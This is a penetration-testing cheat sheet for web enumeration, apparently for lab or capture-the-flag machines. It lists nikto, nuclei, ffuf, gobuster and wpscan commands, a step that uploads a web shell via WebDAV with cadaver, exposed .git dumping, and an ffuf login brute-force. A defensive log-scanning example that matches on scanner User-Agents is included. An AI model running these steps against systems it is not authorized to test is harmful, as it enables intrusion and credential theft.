Web Scanning
- If cgi-bin is present, fuzz it further and look for files such as .sh or .pl (Shellshock).
- Test the login page:
- Obtain valid usernames first.
- Try admin:admin.
- Try username:username as the first credential.
- If the login belongs to a service, try that service's default passwords.
- Try the service name as both the username and the password.
Nikto
Scan web service with nikto:
nikto -h <ip>
Test different ports with one scan:
nikto -h <ip> -p 80,8080,1234
Nuclei
Scan web service with nuclei:
nuclei -u <url>
Enumeration
Directory Fuzzing
ffuf -w <wordlist> -u http://<ip>:<port>/FUZZ -ic
gobuster dir -u http://<ip>:<port>/ -w <wordlist>
Sub-domain Fuzzing
ffuf -w <wordlist> -u http://FUZZ.<URL>/ -ic
gobuster dns -d <URL> -w <wordlist>
VHost Fuzzing
ffuf -w <wordlist> -u http://<url>:<port>/ -H 'Host: FUZZ.<url>' -ic
gobuster vhost -u <URL> -w <wordlist> --append-domain
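The defender's view of the nikto, nuclei, ffuf and gobuster commands above: an added example (not part of this cheat sheet) that flags scanning sources in a web server access log by two signals, a default scanner User-Agent and a high share of 404s across many distinct paths. The log lines are constructed, the User-Agent fragments assume the tools were left at their default settings, and the thresholds are arbitrary starting points.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in Apache/nginx "combined" format (not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /admin HTTP/1.1" 404 162 "-" "Fuzz Faster U Fool v2.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /backup HTTP/1.1" 404 162 "-" "Fuzz Faster U Fool v2.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "Fuzz Faster U Fool v2.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 404 162 "-" "Fuzz Faster U Fool v2.1.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 404 162 "-" "Fuzz Faster U Fool v2.1.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /about.html HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Default User-Agent fragments of the scanners used on this page (assumption: defaults unchanged).
# A User-Agent is trivially spoofed, so treat a match as a weak signal; the 404 ratio is the stronger one.
SCANNER_UA_MARKERS = ("Nikto", "Fuzz Faster U Fool", "gobuster", "WPScan", "Nuclei")

def detect_scanning(log_text, min_requests=5, not_found_ratio=0.8):
    """Return {source_ip: [reasons]} for sources whose traffic looks like web scanning."""
    per_ip = defaultdict(lambda: {"total": 0, "404": 0, "paths": set(), "uas": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rec = m.groupdict()
        s = per_ip[rec["ip"]]
        s["total"] += 1
        s["404"] += int(rec["status"] == "404")
        s["paths"].add(rec["path"])
        s["uas"].add(rec["ua"])
    findings = {}
    for ip, s in per_ip.items():
        reasons = []
        hits = sorted({mk for ua in s["uas"] for mk in SCANNER_UA_MARKERS if mk in ua})
        if hits:
            reasons.append("scanner user-agent: " + ", ".join(hits))
        if s["total"] >= min_requests and s["404"] / s["total"] >= not_found_ratio:
            reasons.append(f"{s['404']}/{s['total']} requests were 404s across {len(s['paths'])} paths")
        if reasons:
            findings[ip] = reasons
    return findings

if __name__ == "__main__":
    for ip, reasons in detect_scanning(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```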
WordPress scan
Update the WPScan database
wpscan --update
Scanning the target
wpscan --url <ip>
Enumerate all plugins with aggressive detection
wpscan --url <url> --enumerate ap --plugins-detection aggressive
Scanning with an API token
wpscan --url https://brainfuck.htb --api-token <redacted>
WebDAV
Davtest
Test servers with WebDAV enabled
davtest --url <url>
Cadaver
Log into WebDAV and upload the web shell to execute
cadaver <url>/dav/
put /tmp/shell.php
Git
Download .git
mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>
git-dumper <IP>/.git ~/website
Extract .git content
mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>
# Show the commit history of the recovered repository.
git log
# Show the full content and diff of a single commit from that history.
git show <commit-id>
With two wordlists (usernames and passwords), use POST fuzzing with two fuzz keywords:
#### FFUF header & token
ffuf -u http://10.129.16.39:8080/j_spring_security_check \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "j_username=FUZZ&j_password=FUZ2" \
-w usernames.txt:FUZZ -w passwords.txt:FUZ2 \
-fr "loginError"
Explanation
-fr "loginError" filters out every response whose body matches loginError, so only responses without the failure marker are kept.
Or alternatively: